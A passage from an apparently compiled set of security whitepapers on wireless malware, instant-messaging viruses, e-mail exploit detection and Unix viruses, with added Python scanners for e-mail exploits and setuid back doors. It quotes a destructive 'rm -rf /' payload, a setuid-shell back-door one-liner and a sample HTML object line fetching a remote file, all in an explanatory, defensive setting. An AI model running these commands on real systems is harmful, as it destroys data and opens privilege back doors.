An independent developer for Palm computers, known as “Ardiri,” assumed credit for designing Liberty Crack, saying its original purpose was to clean up redundant data files. After providing the program to a few friends, Ardiri witnessed its proliferation within the Palm developer community, which then numbered about 80,000. Seeing that he may have caused a problem, he posted warnings about Liberty Crack on various Palm developer sites.

FAST TRACK 125 VI Whitepapers VIRUS-PROOF YOUR PC

This evolution and proliferation of the Trojan horse raises two key aspects of application-based threats. First, it illustrates the potential for proliferation of malicious code, especially in the form of a Trojan, when it is disguised as a program with perceived value that is offered for free. Second, this early case reminds us that operating systems in widest use are likely to be the initial playgrounds of writers of malicious code. The large number of shareware applications available and the growing number of legitimate code developers in the community increases the likelihood of malicious behaviour. Further, the large number of possible affected users raises the potential profile of any malicious activity—an enticement for those seeking the limelight for destructive activities.

Since the discovery of Liberty Crack, antivirus experts such as Trend Micro have been tracking a number of other application-based, potentially destructive Palm programs, including Palm Phage—the first known virus designed to affect Palm PDAs. First seen about one month after Liberty, Palm Phage infects all third-party application programs when executed. Instead of running normally, infected executable files infect other third-party application programs. Palm Phage can theoretically spread to other machines when the Palm is synchronised with a PC or when a Palm beams data via an infrared link to another Palm.

At about the same time, several joke programs were observed on PDAs that operate on the EPOC operating system. Little more than nuisances, these programs (e.g., EPOC_Alone.A and EPOC_Ghost.A) disturb users by sounding an alarm or flashing lights on the EPOC-enabled device. While these programs do not spread from device to device, they demonstrate that malicious code can cause bothersome disturbances on wireless devices.

Furthermore, the wireless world is seeing the regular birth of new technologies, with more on the horizon. Some of these technologies will expand the functionality of the device while others will dramatically change their connectivity with other devices (e.g., Bluetooth technology).

No users have lost data as a result of Palm Phage and the EPOC joke programs. But this malicious code ups the ante for such code in the wireless arena—demonstrating that self-replicating viruses are not only possible to develop, but easy to develop. And with the expanded functionality of these devices in the coming months and years, so will expand the potential for new threats from malicious code.

Content-based Threats

In content-based threats, the content (e.g., derogatory messages) is the threat, or malicious use of the content is the threat (e.g., spamming of e-mail). While e-mail has become the ‘killer app’ of the wireless world, it is also one of the most vulnerable to attack. Hence, the most common content-based threats to the wireless infrastructure occur through infected e-mail or spam mail.

The first content-based Trojan to attack wireless devices occurred in June 2000 with the appearance, in the wild, of the Visual Basic Script (VBS) Timofonica on the wireless network of Madrid, Spain-based Telefonica SA. Timofonica spread by sending infected e-mail messages from affected computers. When an infected e-mail reached a PC, it used Microsoft Outlook 98 or 2000 to send a copy of itself via infected e-mails to all addresses in the MS Outlook Address Book. This enabled the Trojan to spread quite rapidly. In the wired world, this behaviour is similar to that of the “ILoveYou” e-mail virus that caused worldwide damage estimated as high as $700 million in May 2000.

But Timofonica was more than an e-mail virus. For each e-mail it sent, the Trojan also dispatched an SMS message to a randomly generated address at the “correo.movistar.net” Internet host (see Figure 4). Since this host sends SMS messages to mobile phones operating on the European GSM standard (the phone number is the prefix of the e-mail address in the message), the Trojan tried to spam people with SMS messages—in this case a derogatory depiction of Spanish telecom provider Telefonica Moviles.

Like the Liberty Crack Trojan, the Timofonica attack was relatively 
benign and caused little damage. Although the program reached out 
into the wireless world, it propagated via land-based PCs and e-mail, 
not from phone to phone directly. Nevertheless, Timofonica 
demonstrated, in the wild, the ability of malicious code to tap into 
the wireless infrastructure and spread with great speed. Timofonica 
had the potential to flood the wireless network with messages, 
reducing its performance or even impairing its ability to meet load. 
Worse, for wireless users billed on a per-message basis, receiving 
spam costs them money. A similar program was observed on Japan’s 
ambitious I-mode system. Japan’s largest mobile carrier, NTT DoCoMo, 
developed and owns the I-mode system, which appears to have 
successfully captured both consumer and business markets for wireless 
device transactions, wireless Internet access and instant messaging 
in Japan. With more than 10 million users only 18 months after its 
launch, some analysts see I-mode as a feasible alternative to WAP, 
which is being used in Europe and touted in North America. 

In June 2000, a piece of malicious code began to send a particular 
message to wireless users on the I-mode system. When the user 
received the message and clicked on a hypertext link, the program 
dialled 110, the Japanese emergency number equivalent to 911 in 
North America, without the prior knowledge of the user. This loading 
of emergency service lines with useless calls demonstrated the 
ability of malicious code to reach out to other key infrastructures 
and cause serious damage. Another potential content-based threat 
that may soon enter the wireless world, as wireless devices become 
more sophisticated over time, is the embedded script virus. Before 
the first observation of this class of viruses, e-mail-borne viruses 
could only be contracted by double-clicking an infected attachment. 
With the discovery of embedded script viruses such as VBS_Kakworm 
and VBS_Bubbleboy, a virus can infect a user’s system as soon as the 
e-mail is opened or previewed, with no attachment involved. 

Mixed  Application/Content-based  Threats 

Application-based  wireless  threats,  in  which  an  executable  program 
carries  some  malicious  code,  affect  the  receiving  device.  The  spread 
of  this  malicious  code  is  slow  since  the  user  must  download  a pro- 
gram with  malicious  code  and  execute  the  program  to  become 
infected.  At  the  other  end  of  the  spectrum  are  content-based  threats 
that  spread  relatively  benign  text  messages  or  generate  cellular 
phone  calls.  Yet,  these  threats  can  spread  rapidly  due  to  the  nature 
of  their  propagation  medium— entire  address  books  of  e-mails. 

The  third  type  of  threat  is  worse  than  the  previous  two  types 
combined.  While  not  yet  seen  in  the  wild  or  even  in  the  laborato- 
ry, a threat  that  integrates  techniques  from  both  of  these  threat 
types  could  be  formidable  indeed.  Imagine  a virus  that  involved 
the  unwitting  download  of  sophisticated  malicious  code  attached 
to  a shareware  program  that  wiped  out  wireless  device  applica- 
tions and  propagated  itself  rapidly  across  the  wireless  infrastruc- 
ture via  address  books  of  e-mail.  Such  a virus  could  cause  damage 
to  each  device  it  encountered  and  spread  across  a country,  or 
across  the  world,  overnight.  Given  the  reality  of  the  ILoveYou  virus 
and  its  destructive  power,  without  adequate  comprehensive  wire- 
less infrastructure  virus  protection,  some  type  of  highly  destruc- 
tive, rapidly  spreading  wireless  virus  will  inevitably  surface. 

Threats  On  The  Horizon  To  Consumers  And  Corporations 

In  many  parts  of  the  world  today,  cellular  phones  are  used  almost 
exclusively  for  voice  communication.  Yet,  as  cellular  phone  tech- 
nology is  merged  with  the  platform-independent  Java  program- 
ming language  and  emerging  technologies  such  as  Bluetooth, 
these  cell  phones  will  be  able  to  send  and  receive  data  and  appli- 
cations, even  from  one  wireless  device  directly  to  another  wireless 
device.  The  line  between  PDAs  and  cellular  phones  is  already 
blurred,  and  few  dispute  that  the  integrated,  transaction-enabled 
wireless  device  that  handles  both  voice  and  data  will  soon  become 
a widespread  reality. 
So, as consumers download games that can be played offline, access 
the stock market and pay for groceries with their wireless devices, 
business people will read e-mail, send short messages and view 
graphics and charts on theirs. Unfortunately, this wireless utopia is 
unlikely to come without a price: increasingly sophisticated wireless 
threats that utilise the same capabilities (connectivity, 
functionality and speed). Viruses can spread from wireless device to 
wireless device, from wireless device to point-of-sale device (e.g., 
at the grocery counter), and from wireless device to PC. 

The  latter  path  offers  a mode  of  transmission  for  viruses  to 
wireless  and  wired  internal  LANs,  and  further  propagation  across 
the  Internet.  Currently,  corporate  IT  managers  have  little  control 
over  which  wireless  and  handheld  devices  their  users  are  connect- 
ing to  the  network.  Connecting  a portable  device  (such  as  a PDA) 
into  a PC  that  is  connected  (or  subsequently  connected)  to  the  net- 
work is  similar  to  inserting  a floppy  disk— that  has  not  been 
scanned  for  viruses— into  a computer. 

A protection solution for the wireless infrastructure must have the 
following attributes: 

o Multiple layers of protection to address the various entry points 
and transmission paths of viruses and malicious code 

o Integration of centralised management of all antivirus solutions, 
including maintenance of gateway, server, desktop and 
device-level protection 

o Implementation within the wireless infrastructure for early 
detection to minimise damage and costs 

o Tools tailored to the wireless threat, rather than merely applying 
wired-world tools 

o Mechanisms for automatic maintenance, updating and upgrading of 
virus protection, since such protection is only as good as the 
last update 

o Involvement of all parties, via increased awareness of the 
potential threat, including corporate IT managers, service 
providers, operating system and application developers, and end 
users 
IM Viruses 

Source:  “Instant  messaging  safety  and  privacy  tips" 
available  at 

www.microsoft.com/athome/security/chat/imsafety.mspx 

Instant messaging, commonly referred to as IM, is a method of 
online communication like e-mail. The main difference, as the 
name suggests, is that IM is instantaneous. Using an IM program 
such as MSN Messenger, Windows Messenger, AOL Instant Messenger, 
Yahoo Messenger or others, you and a friend can type messages to 
each other and see the messages almost immediately. 

Because  IM  has  become  so  popular,  virus  writers  are  using  it  to 
spread  malicious  programs.  Read  on  to  find  out  how  to  avoid  get- 
ting or  spreading  a virus  when  you  use  IM. 

Understanding  Instant  Message  Viruses 

Like  e-mail  viruses,  instant  message  viruses  are  malicious  or  annoy- 
ing programs  that  are  designed  to  travel  through  IM.  In  most  cases 
these  viruses  are  spread  when  a person  opens  an  infected  file  that 
was  sent  in  an  instant  message  that  appeared  to  come  from  a friend. 

When  unsuspecting  people  open  these  files,  their  computers 
can  become  infected  with  a virus.  Because  of  the  virus,  their  com- 
puters may  slow  down  or  stop  responding,  or  they  may  not  notice 
any  change  at  all.  However,  the  virus  might  have  installed  a covert 
program  on  their  computer  that  could  damage  software,  hard- 
ware, or  important  files,  and  that  may  include  spyware,  which  can 
track  information  entered  on  a computer. 

A computer  infected  by  a virus  may  continue  to  spread  the 
infection  by  sending  copies  of  the  virus  to  everyone  on  your  IM 
contact  list.  A contact  list  is  the  collection  of  IM  names  (similar  to 
an  e-mail  address  book)  that  you  can  store  in  your  IM  program. 

Five  Steps  To  Help  Avoid  Instant  Message  Viruses 

As  with  most  threats  on  the  Internet,  you  can  help  keep  yourself 
safe  by  taking  basic  precautions.  If  you  know  how  to  avoid  e-mail 
viruses, you’ll already be familiar with many of these steps. 

1.  Be  careful  downloading  files  in  IM.  Never  open,  accept,  or 
download  a file  in  IM  from  someone  you  don’t  know.  If  the 
file  comes  from  someone  you  do  know,  don’t  open  it  unless 
you  know  what  the  file  is  and  you  were  expecting  it.  Contact 
the  sender  by  e-mail,  phone,  or  some  other  method  to  con- 
firm that  what  they  sent  was  not  a virus. 

2.  Update  your  Windows  software.  Visit  Windows  Update  to 
scan  your  computer  and  install  any  high-priority  updates 
that  are  offered  to  you.  If  you  have  Automatic  Updates 
enabled,  the  updates  are  delivered  to  you  when  they  are 
released,  but  you  have  to  make  sure  you  install  them. 

3.  Make  sure  you’re  using  an  updated  version  of  your  IM  soft- 
ware. Using  the  most  up-to-date  version  of  your  IM  software 
can  better  protect  your  computer  against  viruses  and  spy- 
ware.  If  you’re  using  MSN  Messenger,  install  the  updated  ver- 
sion by  visiting  the  MSN  Messenger  Web  site  and  clicking  the 
‘Download  Now!’  button. 

4.  Use  anti-virus  software  and  keep  it  updated.  Anti-virus  soft- 
ware can  help  to  detect  and  remove  IM  viruses  from  your 
computer,  but  only  if  you  keep  the  antivirus  software  cur- 
rent. If  you’ve  purchased  a subscription  from  an  anti-virus 
software  company,  your  anti-virus  software  may  update 
itself  when  you’re  connected  to  the  Internet. 

5.  Use  anti-spyware  software  and  keep  it  updated.  Some  IM 
viruses  may  install  spyware  or  other  unwanted  software  on 
your  computer.  Anti-spyware  software  can  help  to  protect 
your  computer  from  spyware  and  remove  any  spyware  you 
may  already  have.  If  you  don’t  have  anti-spyware  software, 
you  can  download  the  new  Microsoft  Windows  AntiSpyware 
(Beta)  or  another  spyware  removal  tool. 
Why You Need An E-mail Exploit Detection Engine 

Source:  “Why  You  Need  an  Email  Exploit  Detection  Engine:  Networks  Must 
Supplement  Anti-Virus  Protection  for  Maximum  Security" 
available  at 

www.secinf.net/anti_virus/Why_You_Need_an_Email_Exploit_Detection_Engine_Net 
works_Must_Supplement_AntiVirus_Protection_for_Maximum_Security.html 


Virus writers are using increasingly complex and sophisticated 
techniques in their bid to circumvent anti-virus software and 
disseminate their viruses. A case in point was the notorious Nimda 
worm, which used multiple methods to spread itself and relied on 
an exploit rather than on the virus/Trojan behaviour that anti-virus 
products typically search for. Anti-virus software, though 
essential, cannot combat such threats alone; an e-mail exploit 
detection tool is also necessary. 

What  Is  An  Exploit? 

An exploit uses a known vulnerability in an application or operating 
system to execute a program or code. It “exploits” a feature of the 
program or the operating system for its own ends, such as executing 
arbitrary machine code, reading or writing files on the hard disk, 
or gaining illicit access. 

What  Is  An  E-mail  Exploit? 

An  e-mail  exploit  is  an  exploit  launched  via  e-mail.  An  e-mail 
exploit  is  essentially  an  exploit  that  can  be  embedded  in  an  e-mail, 
and  executed  on  the  recipient’s  machine  once  the  user  either 
opens  or  receives  the  e-mail.  This  allows  the  hacker  to  bypass  most 
firewalls  and  anti-virus  products. 

The  Difference  Between  Anti-virus  Software  And  E-mail 
Exploit  Detection  Software 

Anti-virus software is designed to detect known malicious code. An 
e-mail exploit engine takes a different approach: it analyses the 
message for exploit techniques that could be malicious. This means it 
can protect against new viruses and, most importantly, against 
unknown viruses or malicious code. This is crucial, as an unknown 
virus could be a one-off piece of code developed specifically to 
break into your network. 

E-mail  exploit  detection  software  analyses  e-mails  for 
exploits— i.e.,  it  scans  for  methods  used  to  exploit  the  OS,  e-mail 
client  or  Internet  Explorer— that  can  permit  execution  of  code  or 
a program  on  the  user’s  system.  It  does  not  check  whether  the 
program  is  malicious  or  not.  It  simply  assumes  there  is  a securi- 
ty risk  if  an  e-mail  is  using  an  exploit  in  order  to  run  a program 
or  piece  of  code. 

In  this  manner,  an  e-mail  exploit  engine  works  like  an  intru- 
sion detection  system  (IDS)  for  e-mail.  The  e-mail  exploit  engine 
might  cause  more  false  positives,  but  it  adds  a new  layer  of  securi- 
ty that  is  not  available  in  a normal  anti-virus  package,  simply 
because  it  uses  a totally  different  way  of  securing  e-mail. 

Anti-virus  engines  do  protect  against  some  exploits  but  they  do 
not  check  for  all  exploits  or  attacks.  An  exploit  detection  engine 
checks  for  all  known  exploits.  Because  the  e-mail  exploit  engine  is 
optimized  for  finding  exploits  in  e-mail,  it  can  therefore  be  more 
effective  at  this  job  than  a general  purpose  anti-virus  engine. 

An  Exploit  Engine  Requires  Fewer  Updates 

An exploit engine needs to be updated less frequently than an 
anti-virus engine because it looks for a method rather than a 
specific virus. Although keeping exploit and anti-virus engines up 
to date involves very similar operations, the results are different. 
Once an exploit is identified and incorporated in an exploit engine, 
that engine can protect against any new virus that is based on that 
known exploit. That means the exploit engine will catch the virus 
even before the anti-virus vendor is aware of its emergence, and 
certainly before the anti-virus definition files have been updated 
to counter the attack. This is a critical advantage, as shown by the 
following examples from 2001. 

The  Lessons  Of  Nimda,  BadTrans.B,  Yaha  And  Bugbear 

Nimda and BadTrans.B are two viruses that became widely known in 
2001 because they infected a colossal number of Windows computers 
with Internet access. Nimda alone is estimated to have affected about 
8.3 million computer networks around the world, according to US 
research firm Computer Economics (November 2001). Nimda is a worm 
that uses multiple methods to infect other computers automatically. 
It can replicate through e-mail using an exploit that was made public 
months before Nimda hit: the MIME header exploit, in which an 
executable attachment is labelled with a harmless MIME type (such as 
audio/x-wav) so that an unpatched Internet Explorer or Outlook client 
runs it automatically when the message is opened or previewed (the 
hole closed by Microsoft bulletin MS01-020 in March 2001). BadTrans.B 
is a mass-mailing worm that distributes itself using the same MIME 
header exploit; it first appeared after the Nimda outbreak. With 
their highly rapid infection rate, both Nimda and BadTrans.B took 
anti-virus vendors by surprise. Though the vendors issued definition 
file updates as soon as they learned about each virus, each had 
already infected a large number of PCs by the time the updates were 
released. And although both viruses used the same exploit, anti-virus 
vendors had to issue a separate definition file update for each. In 
contrast, an e-mail exploit detection engine would have recognized 
the exploit used and identified the attempt to launch an executable 
file automatically using the MIME header exploit. As a result, it 
would have blocked both worms automatically, preventing infection. 

Other  Examples  Of  Exploits 

Double extension vulnerability. Viruses: Klez, Netsky and Lovegate. 
What it does: Malicious files are given a double extension such as 
filename.txt.exe to trick the user into running the executable (with 
Windows hiding known extensions, the file appears as filename.txt). 

URL spoofing exploit. Viruses: No virus/worm has been found to be 
using this method. However, it has been used to inject backdoors on 
Windows computers. 
What it does: Allows spammers and phishers (scammers, or people 
trying to defraud computer users) to fool users into visiting a 
malicious website instead of a legitimate one. 

Object data file execution. Viruses: Bagle.Q. 
What it does: Allows attackers to automatically infect unpatched 
versions of IE/Outlook (Express) by downloading and executing code 
from an HTTP site. 
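The checks such an engine performs can be shown concretely. The Python script below is an added example, not code from the original article or from any product: it classifies messages by the method used rather than by virus signature, covering the MIME header trick of Nimda and BadTrans.B (executable bytes or an executable file name declared under a harmless Content-Type), the double extension used by Klez and Netsky, and a remote <object data=...> reference in an HTML body of the kind Bagle.Q relied on. The sample messages are constructed for the demonstration, and the extension list, the regular expressions and the audio/x-wav example type are assumptions. Because it flags a method rather than a known file, expect false positives (a file named v1.2.exe trips the double-extension rule), as the text above acknowledges.

```python
import email
import re
from email import policy
from email.message import EmailMessage

# Extensions Windows runs directly on double-click (assumed list for the demo).
EXECUTABLE_EXT = (".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs", ".js")

# "invoice.txt.exe" or "invoice.txt      .exe": two extensions, last one executable.
DOUBLE_EXT = re.compile(r"\.[a-z0-9]{1,5}\s*\.[a-z0-9]{1,4}$", re.IGNORECASE)

# <object data="http://..."> in an HTML body: code fetched and run from a remote host.
OBJECT_DATA = re.compile(r"<object\b[^>]*\bdata\s*=\s*['\"]?\s*https?://", re.IGNORECASE)


def is_executable_name(name):
    return name.lower().rstrip().endswith(EXECUTABLE_EXT)


def scan_attachment(part):
    """Method-based findings for one MIME part that carries a file."""
    findings = []
    name = part.get_filename() or ""
    ctype = part.get_content_type()            # declared type, e.g. "audio/x-wav"
    data = part.get_payload(decode=True) or b""

    # MIME header exploit (MS01-020; Nimda, BadTrans.B): an executable declared
    # under a harmless type so an unpatched client opens it automatically.
    # Two independent tells: an executable file name under a non-application
    # type, and a PE/DOS "MZ" header in the decoded bytes whatever the type says.
    if is_executable_name(name) and not ctype.startswith("application/"):
        findings.append(f"mime-header-mismatch: {name!r} declared as {ctype}")
    if data[:2] == b"MZ":
        findings.append(f"executable-content: {name!r} has an MZ header (declared {ctype})")

    # Double extension (Klez, Netsky): relies on Explorer hiding the last extension.
    if is_executable_name(name) and DOUBLE_EXT.search(name):
        findings.append(f"double-extension: {name!r}")
    return findings


def scan_message(raw_bytes):
    """Parse a raw RFC 822 message and return a list of finding strings."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        if part.get_filename():
            findings.extend(scan_attachment(part))
        elif part.get_content_type() == "text/html":
            if OBJECT_DATA.search(part.get_content()):
                findings.append("object-data-remote: <object data=http://...> in HTML body")
    return findings


def build_samples():
    """Constructed test messages (no real malware); returns {label: raw bytes}."""
    def base(subject):
        m = EmailMessage()
        m["From"], m["To"], m["Subject"] = "alice@example.net", "bob@example.net", subject
        return m

    mime = base("listen to this")
    mime.set_content("see attachment")
    # Nimda-style: .exe bytes (fake MZ stub) declared as audio/x-wav
    mime.add_attachment(b"MZ\x90\x00" + b"\x00" * 60, maintype="audio",
                        subtype="x-wav", filename="readme.exe")

    double = base("invoice")
    double.set_content("please review")
    double.add_attachment(b"not a real program", maintype="application",
                          subtype="octet-stream", filename="invoice.txt.exe")

    obj = base("newsletter")
    obj.set_content('<html><body><object data="http://203.0.113.5/x.hta"></object>'
                    "</body></html>", subtype="html")

    clean = base("report")
    clean.set_content("attached as discussed")
    clean.add_attachment(b"%PDF-1.4 constructed sample", maintype="application",
                         subtype="pdf", filename="report.pdf")

    return {"mime_header": mime.as_bytes(), "double_ext": double.as_bytes(),
            "object_data": obj.as_bytes(), "clean": clean.as_bytes()}


if __name__ == "__main__":
    for label, raw in build_samples().items():
        print(label, "->", scan_message(raw) or "no findings")
```

A real gateway would run scan_message() on every message before signature scanning and quarantine anything with findings; the MZ check in particular catches an executable whatever the headers claim, which is the point of checking the method instead of the specimen.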
Computer Viruses In Unix Networks 

Source:  “Computer  Viruses  In  Unix  Networks” 

Available  at 

www.cybersoft.com/whitepapers/papers/print/networks_print.html 

The  Existence  Of  The  Problem  And  Its  Nature 

The  problem  of  software  attacks  exists  in  all  operating  systems. 
These  attacks  follow  different  forms  according  to  the  function 
of  the  attack.  In  general,  all  forms  of  attack  contain  a method 
of  self  preservation  which  may  be  propagation  or  migration 
and  a payload.  The  most  common  method  of  self  preservation 
in  Unix  is  obscurity.  If  the  program  has  an  obscure  name  or 
storage  location,  then  it  may  avoid  detection  until  after  its  pay- 
load  has  had  the  opportunity  to  execute.  Computer  worms  pre- 
serve themselves  by  migration  while  computer  viruses  use 
propagation.  Trojan  horses,  logic  bombs  and  time  bombs  pro- 
tect themselves  by  obscurity. 

While the hostile algorithms that have captured the general 
public’s imagination are viruses and worms, the more common direct 
problem on Unix systems is Trojan horses and time bombs. A Trojan 
horse is a program that appears to be something it is not. An 
example of a Trojan horse is a program that appears to be a 
calculator or other useful utility but has a hidden payload of 
inserting a back door onto its host system. A simple Trojan horse 
can be created by modifying any source code with the addition of a 
payload. One of the favourite payloads observed in the wild is 

/bin/rm -rf / >/dev/null 2>&1 

This payload will attempt to remove every file the user can delete 
on the system, with all output and error messages discarded to 
/dev/null. Since system security is lax at many sites, there are 
normally thousands of files and directories with permission bits 
set to octal 777. All of these will be removed by the attack, 
together with every file owned by the user, writable by their group, 
or otherwise write-accessible to the user. (Strictly, unlinking a 
file requires write permission on the directory that contains it, 
not on the file itself, so the damage is bounded by the directories 
the user can write to.) This payload is not limited to use by Trojan 
horses but can be utilised by any form of attack. Typically, a time 
bomb can be created by using the “cron” or “at” utilities of the 
Unix system to execute this command directly at the specified time. 

While  the  bin  remove  payload  is  a favourite  of  many 
authors,  there  are  other  traditional  attacks  which  are  not  as 
overt  in  their  destruction.  These  other  attacks  are  more  impor- 
tant because  they  bend  the  operation  of  the  system  to  the  pur- 
poses of  the  attacker  while  not  revealing  themselves  to  the  sys- 
tem operator.  Attacks  of  this  form  include  the  appending  of  an 
account  record  to  the  password  file,  copying  the  password  file 
to  an  off  site  email  address  for  leisurely  cracking  and  modifi- 
cation of  the  operating  system  to  include  back  doors  or  cause 
the  transfer  of  money  or  property.  It  is  extremely  simple  to 
email  valuable  information  off  site  in  such  a manner  as  to 
ensure  that  the  recipient  cannot  be  traced  or  located.  Some  of 
these  methods  are  path  dependent,  however,  the  path  selected 
is  at  the  discretion  of  the  attacker. 

One of the simplest methods of inserting a back door is the 
well-known suid bit shell attack. In this attack, a Trojanised 
program is used to copy a shell program to an accessible directory. 
The shell copy is then set with permission bits that allow it to 
execute with the user id and permissions of its creator. A simple 
one-line suid bit shell attack can be created by adding the 
following command to a user’s “.login” or any other file that they 
execute: 

cp /bin/sh /tmp/gotu ; chmod 4777 /tmp/gotu 

Whoever later runs /tmp/gotu gets a shell with the victim’s user id. 
Note that modern Bourne-derived shells such as bash reset the 
effective user id to the real user id at startup unless invoked with 
-p, and many systems mount /tmp nosuid, so the one-liner as written 
no longer works everywhere; a setuid copy of a privileged program in 
a world-writable directory is nevertheless still the pattern to 
hunt for. 
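Both the cron/at time bomb and the setuid shell above leave artefacts on disk that can be hunted for. The following Python script is an added example, not part of the original paper or of any product: it walks a directory tree for setuid regular files, flags those that are a byte-for-byte copy of a system shell, world-writable (mode 4777, as in the one-liner), or sitting in a world-writable directory, and scans crontab text for the rm -rf / payload. The demo() function builds the scenario in a scratch directory with a constructed stand-in for /bin/sh; the shell list and the regular expression are assumptions for the demonstration.

```python
import hashlib
import os
import re
import shutil
import stat
import tempfile

# System shells a planted setuid file is most often copied from (assumed list).
DEFAULT_SHELLS = ("/bin/sh", "/bin/bash", "/bin/dash", "/bin/ksh", "/bin/csh")

# rm with a recursive flag whose target is "/" or "/*" (not /tmp/x): the paper's
# "bin remove" payload in the forms it takes in a crontab or login script.
DESTRUCTIVE_RM = re.compile(r"\brm\s+(?:-\w+\s+)*?-\w*r\w*\s+(?:-\w+\s+)*/(?:\*|\s|$)")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def shell_hashes(shells=DEFAULT_SHELLS):
    """Hashes of the system shells present on this host (missing ones skipped)."""
    return {sha256_file(p) for p in shells if os.path.isfile(p)}


def find_setuid_files(root):
    """(path, permission bits, uid) for every regular file under root with the
    setuid bit set. lstat is used so symlinks are neither followed nor counted."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append((path, stat.S_IMODE(st.st_mode), st.st_uid))
    return found


def classify_setuid(entries, known_shell_hashes):
    """{path: reasons} for setuid files that look like planted back doors."""
    report = {}
    for path, mode, _uid in entries:
        reasons = []
        try:
            if sha256_file(path) in known_shell_hashes:
                reasons.append("copy of a system shell")
        except OSError:
            reasons.append("unreadable setuid file")
        if mode & stat.S_IWOTH:
            reasons.append("world-writable setuid file")
        parent = os.path.dirname(path) or "."
        if os.lstat(parent).st_mode & stat.S_IWOTH:
            reasons.append("setuid file in world-writable directory")
        if reasons:
            report[path] = "; ".join(reasons)
    return report


def destructive_cron_lines(crontab_text):
    """Crontab lines (comments excluded) that schedule the rm -rf / payload."""
    return [ln for ln in crontab_text.splitlines()
            if not ln.lstrip().startswith("#") and DESTRUCTIVE_RM.search(ln)]


def demo():
    """Constructed scenario: plant the paper's one-liner in a scratch directory
    (a stand-in file replaces /bin/sh) and run the checks. Returns
    (planted_path, report, cron_hits)."""
    base = tempfile.mkdtemp(prefix="suidscan-")
    os.chmod(base, 0o1777)                           # same bits as /tmp
    fake_sh = os.path.join(base, "fake-sh")          # stands in for /bin/sh
    with open(fake_sh, "wb") as fh:
        fh.write(b"#!/bin/sh\n# constructed stand-in for a shell binary\n")
    known = {sha256_file(fake_sh)}
    planted = os.path.join(base, "gotu")             # cp /bin/sh /tmp/gotu
    shutil.copyfile(fake_sh, planted)
    os.chmod(planted, 0o4777)                        # chmod 4777 /tmp/gotu
    with open(os.path.join(base, "notes.txt"), "w") as fh:
        fh.write("harmless file\n")
    report = classify_setuid(find_setuid_files(base), known)
    crontab = ("0 3 * * * find /tmp -mtime +7 -exec rm -rf {} \\;\n"   # legitimate
               "# 0 0 1 1 * rm -rf /\n"                                 # comment
               "0 0 1 1 * /bin/rm -rf / >/dev/null 2>&1\n")            # time bomb
    return planted, report, destructive_cron_lines(crontab)


if __name__ == "__main__":
    planted, report, hits = demo()
    print(report.get(planted), hits)
```

On a real host, run find_setuid_files() over /tmp, /var/tmp and users' home directories with the hashes from shell_hashes(), and feed destructive_cron_lines() the output of crontab -l for each user together with the files under /var/spool/cron and /etc/cron.d; the at queue needs the same treatment.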

Trojan horses and time bombs can be located using the same 
methods required to locate viruses in the Unix environment. There 
are many technical reasons why these forms of attack are less 
desirable from the attacker’s point of view, the foremost being 
their immobility. A virus or worm attack is more important because 
these programs are mobile and can integrate themselves into the 
operating system. Of these two forms of attack, the virus attack is 
the hardest to detect and has the best chance of survival. Worms can 
be seen in the system process tables and eliminated, since they 
exist as individual processes, while virus attacks are protected 
from this form of detection by their host programs. All of the 
methods used to detect and prevent viruses are also effective 
against the other forms of attack; therefore, the remainder of this 
paper will deal with the more serious problem of viral attacks. 


Unix  Virus  Attacks 

The  promotion  of  the  concept  of  “magical  immunity”  to  com- 
puter viral  attacks  surfaces  on  a regular  basis.  This  concept, 
while  desirable,  is  misleading  and  dangerous  since  it  tends  to 
mask  a real  threat.  Opponents  of  the  possibility  of  viral  attacks 
in  Unix  state  that  hardware  instructions  and  operating  system 
concepts  such  as  supervisor  mode  or  permission  settings,  secu- 
rity ratings  like  C2  or  B1  provide  protection.  These  ideas  have 
been  proven  wrong  by  real  life.  The  use  of  supervisor  mode,  the 
additional  levels  of  protection  provided  by  C2  and  the  manda- 
tory access  control  provided  by  security  level  B1  are  not  neces- 
sary for  viral  activity  and  are  therefore  moot  as  a method  of 
protection.  This  fact  is  supported  by  the  existence  of  viruses 
that  infect  Unix  systems  as  both  scripts  and  binary. 

In fact, virus attacks against Unix systems will eventually become 
more popular as simpler forms of attack become obsolete. Computer 
viruses have significantly more virulence, more methods of 
protection and more opportunity for infection. Methods of protection 
have been highly refined in viruses, including rapid reproduction by 
infection, migration through evaluation of the environment (boot 
viruses look for uninfected floppy diskettes), armour, stealth and 
polymorphism. In addition, the host system itself becomes a method 
of protection and propagation: virus-infected files are protected by 
the operating system just as much as non-infected files are. 
Introduction of viruses into systems has also been refined using a 
technique called ‘droppers’. A dropper is a Trojan horse that has a 
virus or viruses as its payload. Finally, extensive networking 
technology such as NFS (Network File System) allows viruses to 
migrate between systems without effort. 
All of these reasons point to viruses as the future of hostile 
algorithms; however, the most significant reason for this 
determination is the effectiveness of the virus as a form of attack. 
Past experiments by Doctor Fred Cohen [1984] used a normal user 
account on a Unix system, without privileged access, and gained 
total security penetration in 30 minutes. Doctor Cohen repeated 
these results on many versions of Unix, including AT&T Secure Unix 
and over 20 commercial implementations of Unix. The results have 
been confirmed by independent researchers worldwide. Separate 
experiments by Tom Duff [1989] demonstrated the tenacity of Unix 
viruses even in the face of disinfectors. The virus used in Mr. 
Duff’s experiment was a simple virus written as a shell script. The 
virus is believed to have been reintroduced by the operating system 
from the automated backup and restore system; re-infection took 
place after the system had been virus-free for one year. 

Heterogeneous  Virus  Attacks 

Non-Unix  PCs  attached  to  a heterogeneous  network  that  were 
infected  with  computer  viruses  originating  from  Unix  servers 
have  been  observed.  The  Unix  systems  were  not  the  original 
point  of  entry  for  the  viruses.  They  were  dormant  while  on  the 
Unix  systems  but  became  harmful  when  they  migrated  to  their 
target  systems.  The  Unix  systems  acted  as  unaffected  carriers  of 
computer  viruses  for  other  platforms.  For  the  sake  of  simplici- 
ty, I have  named  this  effect  after  an  historical  medical  problem 
of  similar  nature,  ‘Typhoid  Mary  Syndrome’.  Networks  and 
specifically  Unix  servers  that  provide  network  file  systems  are 
very  susceptible  to  this  problem. 

This problem was first observed while investigating an infection 
of personal computers attached to a network with a large population 
of Unix servers and workstations. The viruses were removed manually 
